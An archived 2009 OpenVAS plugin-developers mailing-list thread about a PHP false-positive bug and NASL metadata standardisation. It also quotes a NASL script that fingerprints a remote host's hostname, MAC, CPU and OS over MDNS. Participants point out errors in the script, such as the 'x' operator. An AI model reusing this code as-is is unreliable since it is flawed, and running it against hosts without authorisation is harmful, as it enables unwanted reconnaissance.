+gWWOF83plQCQ6UJhSGfzf0HSHpFKag6XwJ8Yq1piSk9E2qNfV8nB2NI0y0XxPUD > cL1YDn0275zN+c8Otlvvi0o78xd2AVAIpki8O8jc/zR5beZMpFT9xDGPAogKCFbw > RkIao07R/p40GXukihA6uhlmEojoXB3hVV8hnWBNXV3YbVdxn4PlS0GvikZKMTsh > cfOIqzhuDBiNrQ+IV1irh0D9xCtu/7FI2coOxqvrDjEHlCz/lIH1IMfxLceRV83d > PNL10Zn6g0zBSK7X0HesW/62CuRksivOfphdhWZTlVnFQE6MnIU4atWOSkui8Gk= > =oogL > -----END PGP SIGNATURE----- > > > > ------------------------------ > > Message: 3 > Date: Thu, 12 Mar 2009 16:15:07 +0530 > From: "Chandrashekhar B" > Subject: Re: [Openvas-plugins] bug in php detection scripts > To: "'Vlatko Kosturjak'" , "'openvas-plugins'" > > Message-ID: <3FE1A4912A75412D8347EAD7D1A88FA8 at bchandra> > Content-Type: text/plain; charset="us-ascii" > > Hello Kost, > > Thanks for reporting. There's actually another KB item called "PHP/Port" set > along with "PHP/Version" which is being used in some scripts and some aren't > using it. We are addressing this now. > > Thanks, > Chandra. > > > -----Original Message----- > From: openvas-plugins-bounces at wald.intevation.org > [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Vlatko > Kosturjak > Sent: Thursday, March 12, 2009 3:19 PM > To: openvas-plugins > Subject: [Openvas-plugins] bug in php detection scripts > > Hello! > > Imagine following scenario. I have 5 web/http ports on single IP > address. one have PHP and it is vulnerable, but it will report all 5 > http ports are prone to php vulnerability. > > It's because it sets general PHP/Version variable and I get that all > http ports are vulnerable. > > It would be good (and correct) to put PHP under following hieararchy: > www//phpversion=x.x.x > > Currently it is bugged and reports the non-existant vulnerabilities to > other ports. Specifically > secpod_php_sec_bypass_n_file_write_vuln_900184.nasl > and > gb_php_detect.nasl > > Kost > _______________________________________________ > Openvas-plugins mailing list > Openvas-plugins at wald.intevation.org > http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins > > > > ------------------------------ > > _______________________________________________ > Openvas-plugins mailing list > Openvas-plugins at wald.intevation.org > http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins > > > End of Openvas-plugins Digest, Vol 16, Issue 2 > ********************************************** _______________________________________________ Openvas-plugins mailing list Openvas-plugins at wald.intevation.org http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins From shawnduffy at gmail.com Thu Mar 12 15:52:44 2009 From: shawnduffy at gmail.com (Shawn Duffy) Date: Thu, 12 Mar 2009 10:52:44 -0400 Subject: [Openvas-plugins] Standardization of plugin formats Message-ID: <49B921BC.3010707@gmail.com> Are there any plans to enforce some sort of standard format for plugin information in plugins? I'm currently writing an app that parses the plugins for information and stores it in a database. The app, once it reaches a reasonable level of maturity, will be open source and available to anyone. However, in trying to extract information from plugin files, I'm finding a huge variety of formats for plugin information. For example, plugin name. There are multiple ways the name may appear in a particular plugin: script_name("Actual name of script"); script_name(english:"Actual name of script"); script_name(english:name["english"]); name["english"] = "Actual name of script"; name["english"] = "Actual name of script"; The script category is another example. I thought the standard format was: script_category(XXXXXX); Until I saw: script_summary(english:"XXXXXX"); script_category(XXXXXXXXXX); Is it possible to parse this using a fairly simple RegEx? Sure. But since everyone appears to be free to add their info anyway they like, as long as it is syntactically correct in NASL, you're forced to continually check new plugins to see if some other contributed script has come up with an entirely new way to enter the info. So, are there any plans to come up with a basic "style guide" for plugins? And reject any that aren't in the specific format? It would be nice to know that script_name, for example, will _always_ be: name["english"] = name["francais"] = and so on. I think in the long run this will make OpenVAS that much more extensible and scalable. I'd even volunteer to help come up with the guidelines if necessary. Thoughts and criticisms welcome... Thanks, Shawn From lists at securityspace.com Thu Mar 12 16:05:58 2009 From: lists at securityspace.com (Thomas Reinke) Date: Thu, 12 Mar 2009 11:05:58 -0400 Subject: [Openvas-plugins] Standardization of plugin formats In-Reply-To: <49B921BC.3010707@gmail.com> References: <49B921BC.3010707@gmail.com> Message-ID: <49B924D6.9000206@securityspace.com> If you are looking at extracting information such as category, ids, etc, out of the script, you might want to consider checking the OTP protocol. It's not very complicated to connect to the server and send a syntactically correct connection request (uid/password,etc) to the server, after which it immediately dumps to you all the information available it has on each script, one line per script. Thomas Shawn Duffy wrote: > Are there any plans to enforce some sort of standard format for plugin > information in plugins? I'm currently writing an app that parses the > plugins for information and stores it in a database. The app, once it > reaches a reasonable level of maturity, will be open source and > available to anyone. > > However, in trying to extract information from plugin files, I'm finding > a huge variety of formats for plugin information. For example, plugin > name. There are multiple ways the name may appear in a particular plugin: > > script_name("Actual name of script"); > script_name(english:"Actual name of script"); > script_name(english:name["english"]); > name["english"] = "Actual name of script"; > name["english"] = > "Actual name of script"; > > The script category is another example. I thought the standard format was: > > script_category(XXXXXX); > > Until I saw: > > script_summary(english:"XXXXXX"); script_category(XXXXXXXXXX); > > Is it possible to parse this using a fairly simple RegEx? Sure. But > since everyone appears to be free to add their info anyway they like, as > long as it is syntactically correct in NASL, you're forced to > continually check new plugins to see if some other contributed script > has come up with an entirely new way to enter the info. > > So, are there any plans to come up with a basic "style guide" for > plugins? And reject any that aren't in the specific format? It would > be nice to know that script_name, for example, will _always_ be: > > name["english"] = > name["francais"] = > > and so on. I think in the long run this will make OpenVAS that much > more extensible and scalable. I'd even volunteer to help come up with > the guidelines if necessary. Thoughts and criticisms welcome... > > Thanks, > Shawn > > _______________________________________________ > Openvas-plugins mailing list > Openvas-plugins at wald.intevation.org > http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins > From shawnduffy at gmail.com Thu Mar 12 16:13:50 2009 From: shawnduffy at gmail.com (Shawn Duffy) Date: Thu, 12 Mar 2009 11:13:50 -0400 Subject: [Openvas-plugins] Standardization of plugin formats In-Reply-To: <49B924D6.9000206@securityspace.com> References: <49B921BC.3010707@gmail.com> <49B924D6.9000206@securityspace.com> Message-ID: <49B926AE.5090608@gmail.com> Thanks... I'll take a look at it. Thomas Reinke wrote: > If you are looking at extracting information such as category, ids, > etc, out of the script, you might want to consider checking the > OTP protocol. It's not very complicated to connect to the server > and send a syntactically correct connection request (uid/password,etc) > to the server, after which it immediately dumps to you all the > information available it has on each script, one line per script. > > Thomas > > Shawn Duffy wrote: >> Are there any plans to enforce some sort of standard format for plugin >> information in plugins? I'm currently writing an app that parses the >> plugins for information and stores it in a database. The app, once it >> reaches a reasonable level of maturity, will be open source and >> available to anyone. >> >> However, in trying to extract information from plugin files, I'm finding >> a huge variety of formats for plugin information. For example, plugin >> name. There are multiple ways the name may appear in a particular >> plugin: >> >> script_name("Actual name of script"); >> script_name(english:"Actual name of script"); >> script_name(english:name["english"]); >> name["english"] = "Actual name of script"; >> name["english"] = >> "Actual name of script"; >> >> The script category is another example. I thought the standard format >> was: >> >> script_category(XXXXXX); >> >> Until I saw: >> >> script_summary(english:"XXXXXX"); script_category(XXXXXXXXXX); >> >> Is it possible to parse this using a fairly simple RegEx? Sure. But >> since everyone appears to be free to add their info anyway they like, as >> long as it is syntactically correct in NASL, you're forced to >> continually check new plugins to see if some other contributed script >> has come up with an entirely new way to enter the info. >> >> So, are there any plans to come up with a basic "style guide" for >> plugins? And reject any that aren't in the specific format? It would >> be nice to know that script_name, for example, will _always_ be: >> >> name["english"] = >> name["francais"] = >> >> and so on. I think in the long run this will make OpenVAS that much >> more extensible and scalable. I'd even volunteer to help come up with >> the guidelines if necessary. Thoughts and criticisms welcome... >> >> Thanks, >> Shawn >> >> _______________________________________________ >> Openvas-plugins mailing list >> Openvas-plugins at wald.intevation.org >> http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins >> > > From meyer at strato-rz.de Thu Mar 12 17:09:26 2009 From: meyer at strato-rz.de (Michael Meyer) Date: Thu, 12 Mar 2009 17:09:26 +0100 Subject: [Openvas-plugins] Standardization of plugin formats In-Reply-To: <49B921BC.3010707@gmail.com> References: <49B921BC.3010707@gmail.com> Message-ID: <20090312160926.GB22960@strato-rz.de> *** Shawn Duffy wrote: > Is it possible to parse this using a fairly simple RegEx? Sure. But > since everyone appears to be free to add their info anyway they like, as > long as it is syntactically correct in NASL, you're forced to > continually check new plugins to see if some other contributed script > has come up with an entirely new way to enter the info. Throw maybe take a look at http://cpansearch.perl.org/src/RALAMOSM/Parse-Nessus-Plugin-0.5/lib/Parse/Nessus/Plugin.pm Maybe it's inspiring ... Micha From christian.edjenguele at owasp.org Thu Mar 12 21:14:35 2009 From: christian.edjenguele at owasp.org (Christian Eric Edjenguele) Date: Thu, 12 Mar 2009 21:14:35 +0100 Subject: [Openvas-plugins] help on nasl In-Reply-To: <6BCBF723D32046D09C6B551F4DF1759A@bchandra> References: <49B662A0.7010207@owasp.org> <6BCBF723D32046D09C6B551F4DF1759A@bchandra> Message-ID: <49B96D2B.90603@owasp.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Chandrashekhar B wrote: > Christian, > > What's 'X' supposed to do in ln 80? Guess, you wanted it to be '*' ? the 'x' must repeat 'x times' the string, according to nasl documentation for more details please see the complete script bellow: # OpenVAS Vulnerability Test # $Id$ # Description: # MDNS, Bonjour, zeroconf Service detection and Information Gathering # # remote-detect-MDNS.nasl # # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2+, # as published by the Free Software Foundation # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. # if(description) { script_id(101002); name["english"] = "Ensure the presence of the MDNS Service"; script_name(english:name["english"]); desc["english"] = " The Remote Host is Running the MDNS Service. Zeroconf, or Zero Configuration Networking, often kwon as MDNS or Bonjour/rendez-vous, is a set of techniques that automatically create a usable IP network without configuration or special servers. Solution : It's recommanded to disable this service if not use. Risk factor : None"; script_description(english:desc["english"]); summary["english"] = "Detects the presence of the MDNS service"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Written by Christian Eric Edjenguele and released under GPL v2 or later"); family["english"] = "Service detection"; script_family(english:family["english"]); script_require_ports(5353); exit(0); } # # The script code starts here # include("misc_func.inc"); # # Functions for mdns protocol manipulation # function grabHostInfos(stringa) { length = ord(stringa[51]) x 256 + ord(stringa[52]) - 1; straddr = substr(stringa, 54, 51 + length); pad = split(straddr, sep:"["); addr = str_replace(string:pad[1], find:"]", replace:""); na = str_replace(string:pad[0], find:"0xe20x800x99", replace:""); nb = str_replace(string:na, find:'\ ', replace:"-"); n = str_replace(string:nb, find:'\'', replace:""); limits = max_index(n) - 1; name = n[limits]; # save the mac address and hostname infos = make_array(0, addr, 1, name); return (infos); } function grabCpuInfos(stringa) { offset = 13 + ord(stringa[12]) + 23; # determine the limits to extract cpu type cpu_len = ord(stringa[offset]); mn = offset + 1; mj = mn + cpu_len; cpu_type = substr(stringa , mn , mj); # determine the limits to extract operating system type offset += cpu_len + 1; minor = offset + 1; major = minor + ord(stringa[offset]); pados = substr(stringa , minor , major ); os = split(pados, sep:";"); os_x = os[0]; # save cpu type and operating system infos = make_array(0, cpu_type, 1, os_x); return (infos); } function RunMDNSQuery(query, itype) { if(strlen(query) != 3) return; pkt2 = ""; pkt1 = "0x000x4a0x010x000x000x010x000x000x000x000x000x00"; foreach element (query) { length = strlen(element); pkt1 += raw_string(length) + element; } if(itype == 'PTR') pkt1 += "0x000x000x0c0x000x01"; if(itype == 'HINFO') { foreach element (query) { pkt1 += "0x000x0d0x000x010x00"; return (pkt1); } } return (pkt1); } # # NVT starts here # # define some local variables port = 5353; version = ""; qry1 = make_list('_daap', '_tcp', 'local'); qry2 = make_list('_workstation', '_tcp', 'local'); # forge the MDNS Host Infos negociation protocol pkt1 = RunMDNSQuery(query:qry1, itype:'PTR'); pkt2 = RunMDNSQuery(query:qry2, itype:'PTR'); if(get_port_state(port)) { soc = open_sock_udp(port); if(soc) { send(socket:soc, data:pkt1); send(socket:soc, data:pkt2); reply = recv(socket:soc, length:1024); if(reply) # get host informations hostinfos = grabHostInfos(stringa:reply); qry3 = make_list(hostinfos[1], 'local', ''); # forge the MDNS CPU Infos negociation protocol pkt3 = RunMDNSQuery(query:qry3, itype:'HINFO'); send(socket:soc, data:pkt3); reply = recv(socket:soc, length:4096); # get cpu informations cpuinfos = grabCpuInfos(stringa:reply); close(soc); } # save gathered informations into variables mac_address = hostinfos[0]; hostname = hostinfos[1]; cpu_type = cpuinfos[0]; operating_system = cpuinfos[1]; # build report string report = 'Hostname: ' + hostname; report += ' \nMAC Address: ' + mac_address; report += '\nCPU Type: ' + cpu_type; report += '\nOperating System: ' + operating_system; # Save informations into the kb set_kb_item (name:"MDNS/Host/hostname", value:hostname); set_kb_item (name:"MDNS/Host/OS", value:operating_system); set_kb_item (name:"MDNS/Host/MacAddress", value:mac_address); set_kb_item (name:"MDNS/Host/CpuType", value:cpu_type); register_service(port:port, ipproto:"udp", proto:"mdns"); # report MDNS service running security_note(port:port, data:report); } > > Chandra. > > -----Original Message----- > From: openvas-plugins-bounces at wald.intevation.org > [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Christian > Eric Edjenguele > Sent: Tuesday, March 10, 2009 6:23 PM > To: openvas-plugins at wald.intevation.org > Subject: [Openvas-plugins] help on nasl > > Hello I'm writing a nvt to fingerprint os through MDNS on windows, I got > an error, see screenshot attached for details. > > any suggestion ? > Thanks. - -- Christian Eric Edjenguele IT Security Software Engineer / IT Enterprise Software Architect Mobile (IT): +39 3408580513 PGP KeyID: 0xB1654498 Key Server: http://pgp.mit.edu - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.9 (GNU/Linux) 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 E1MQObpE5A== =7VGF - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJJuW0YAAoJENETScWxZUSYJJAH/Rv+fFLZbFj1JsEfk8L8QX6r zqyVFpvylk0FRO8S5Lz9ua6qYU47CBv1QcGmR0FPIe4LtOlTf1y2vkYI3xuNkAxr i/EPJzdjHLtHc50Kjdik6cae15snhjraBSpCLkusq2FMW52rzF+KMJ8/wvtgyluS kgJe3Hw9i5ojmzvr+xjiIueRiLJJFmYy+o3fCPR/U/c9cNMa2awdiNJDiDGn08BU wsCzm5zuQeaCLUKxOU6ST9qxlTTzH2N/1mhJfnxsK7L038IpurHnvjxpfM9Iwzr7 iUXGzDtw5w07/SSiwnqADSKSDhlnfLgrbkgyLugtJU1eb1JqGrNPGwleJ5tCzZc= =ZmWJ -----END PGP SIGNATURE----- From bchandra at secpod.com Fri Mar 13 07:24:29 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Fri, 13 Mar 2009 11:54:29 +0530 Subject: [Openvas-plugins] Standardization of plugin formats In-Reply-To: <20090312160926.GB22960@strato-rz.de> References: <49B921BC.3010707@gmail.com> <20090312160926.GB22960@strato-rz.de> Message-ID: <8D12BC8129FB416BB6176E5651A3830F@bchandra> We have a NASL parser already in some format which parses most part of the description elements and also there are some additional scripts to check the correctness of various description elements. Some amount of additional work is required, once we are done with that, we'll be releasing in GPL. This will help to enforce the standards. Thanks, Chandra. -----Original Message----- From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Michael Meyer Sent: Thursday, March 12, 2009 9:39 PM To: openvas-plugins at wald.intevation.org Subject: Re: [Openvas-plugins] Standardization of plugin formats *** Shawn Duffy wrote: > Is it possible to parse this using a fairly simple RegEx? Sure. But > since everyone appears to be free to add their info anyway they like, as > long as it is syntactically correct in NASL, you're forced to > continually check new plugins to see if some other contributed script > has come up with an entirely new way to enter the info. Throw maybe take a look at http://cpansearch.perl.org/src/RALAMOSM/Parse-Nessus-Plugin-0.5/lib/Parse/Ne ssus/Plugin.pm Maybe it's inspiring ... Micha _______________________________________________ Openvas-plugins mailing list Openvas-plugins at wald.intevation.org http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins From bchandra at secpod.com Fri Mar 13 07:47:52 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Fri, 13 Mar 2009 12:17:52 +0530 Subject: [Openvas-plugins] help on nasl In-Reply-To: <49B96D2B.90603@owasp.org> References: <49B662A0.7010207@owasp.org> <6BCBF723D32046D09C6B551F4DF1759A@bchandra> <49B96D2B.90603@owasp.org> Message-ID: Hello Chirstian, I don't have mDNS setup to try. In this line, length = ord(stringa[51]) x 256 + ord(stringa[52]) - 1; You are trying to get ord() and call that 256 times. This ord(stringa[51]) will not change any number of times you call. That's why I was asking what you are trying to do in the above line. Chandra. -----Original Message----- From: Christian Eric Edjenguele [mailto:christian.edjenguele at owasp.org] Sent: Friday, March 13, 2009 1:45 AM To: Chandrashekhar B Cc: openvas-plugins at wald.intevation.org Subject: Re: [Openvas-plugins] help on nasl -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Chandrashekhar B wrote: > Christian, > > What's 'X' supposed to do in ln 80? Guess, you wanted it to be '*' ? the 'x' must repeat 'x times' the string, according to nasl documentation for more details please see the complete script bellow: # OpenVAS Vulnerability Test # $Id$ # Description: # MDNS, Bonjour, zeroconf Service detection and Information Gathering # # remote-detect-MDNS.nasl # # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2+, # as published by the Free Software Foundation # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. # if(description) { script_id(101002); name["english"] = "Ensure the presence of the MDNS Service"; script_name(english:name["english"]); desc["english"] = " The Remote Host is Running the MDNS Service. Zeroconf, or Zero Configuration Networking, often kwon as MDNS or Bonjour/rendez-vous, is a set of techniques that automatically create a usable IP network without configuration or special servers. Solution : It's recommanded to disable this service if not use. Risk factor : None"; script_description(english:desc["english"]); summary["english"] = "Detects the presence of the MDNS service"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Written by Christian Eric Edjenguele and released under GPL v2 or later"); family["english"] = "Service detection"; script_family(english:family["english"]); script_require_ports(5353); exit(0); } # # The script code starts here # include("misc_func.inc"); # # Functions for mdns protocol manipulation # function grabHostInfos(stringa) { length = ord(stringa[51]) x 256 + ord(stringa[52]) - 1; straddr = substr(stringa, 54, 51 + length); pad = split(straddr, sep:"["); addr = str_replace(string:pad[1], find:"]", replace:""); na = str_replace(string:pad[0], find:"0xe20x800x99", replace:""); nb = str_replace(string:na, find:'\ ', replace:"-"); n = str_replace(string:nb, find:'\'', replace:""); limits = max_index(n) - 1; name = n[limits]; # save the mac address and hostname infos = make_array(0, addr, 1, name); return (infos); } function grabCpuInfos(stringa) { offset = 13 + ord(stringa[12]) + 23; # determine the limits to extract cpu type cpu_len = ord(stringa[offset]); mn = offset + 1; mj = mn + cpu_len; cpu_type = substr(stringa , mn , mj); # determine the limits to extract operating system type offset += cpu_len + 1; minor = offset + 1; major = minor + ord(stringa[offset]); pados = substr(stringa , minor , major ); os = split(pados, sep:";"); os_x = os[0]; # save cpu type and operating system infos = make_array(0, cpu_type, 1, os_x); return (infos); } function RunMDNSQuery(query, itype) { if(strlen(query) != 3) return; pkt2 = ""; pkt1 = "0x000x4a0x010x000x000x010x000x000x000x000x000x00"; foreach element (query) { length = strlen(element); pkt1 += raw_string(length) + element; } if(itype == 'PTR') pkt1 += "0x000x000x0c0x000x01"; if(itype == 'HINFO') { foreach element (query) { pkt1 += "0x000x0d0x000x010x00"; return (pkt1); } } return (pkt1); } # # NVT starts here # # define some local variables port = 5353; version = ""; qry1 = make_list('_daap', '_tcp', 'local'); qry2 = make_list('_workstation', '_tcp', 'local'); # forge the MDNS Host Infos negociation protocol pkt1 = RunMDNSQuery(query:qry1, itype:'PTR'); pkt2 = RunMDNSQuery(query:qry2, itype:'PTR'); if(get_port_state(port)) { soc = open_sock_udp(port); if(soc) { send(socket:soc, data:pkt1); send(socket:soc, data:pkt2); reply = recv(socket:soc, length:1024); if(reply) # get host informations hostinfos = grabHostInfos(stringa:reply); qry3 = make_list(hostinfos[1], 'local', ''); # forge the MDNS CPU Infos negociation protocol pkt3 = RunMDNSQuery(query:qry3, itype:'HINFO'); send(socket:soc, data:pkt3); reply = recv(socket:soc, length:4096); # get cpu informations cpuinfos = grabCpuInfos(stringa:reply); close(soc); } # save gathered informations into variables mac_address = hostinfos[0]; hostname = hostinfos[1]; cpu_type = cpuinfos[0]; operating_system = cpuinfos[1]; # build report string report = 'Hostname: ' + hostname; report += ' \nMAC Address: ' + mac_address; report += '\nCPU Type: ' + cpu_type; report += '\nOperating System: ' + operating_system; # Save informations into the kb set_kb_item (name:"MDNS/Host/hostname", value:hostname); set_kb_item (name:"MDNS/Host/OS", value:operating_system); set_kb_item (name:"MDNS/Host/MacAddress", value:mac_address); set_kb_item (name:"MDNS/Host/CpuType", value:cpu_type); register_service(port:port, ipproto:"udp", proto:"mdns"); # report MDNS service running security_note(port:port, data:report); } > > Chandra. > > -----Original Message----- > From: openvas-plugins-bounces at wald.intevation.org > [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Christian > Eric Edjenguele > Sent: Tuesday, March 10, 2009 6:23 PM > To: openvas-plugins at wald.intevation.org > Subject: [Openvas-plugins] help on nasl > > Hello I'm writing a nvt to fingerprint os through MDNS on windows, I got > an error, see screenshot attached for details. > > any suggestion ? > Thanks. - -- Christian Eric Edjenguele IT Security Software Engineer / IT Enterprise Software Architect Mobile (IT): +39 3408580513 PGP KeyID: 0xB1654498 Key Server: http://pgp.mit.edu - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.9 (GNU/Linux) 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 E1MQObpE5A== =7VGF - -----END PGP PUBLIC 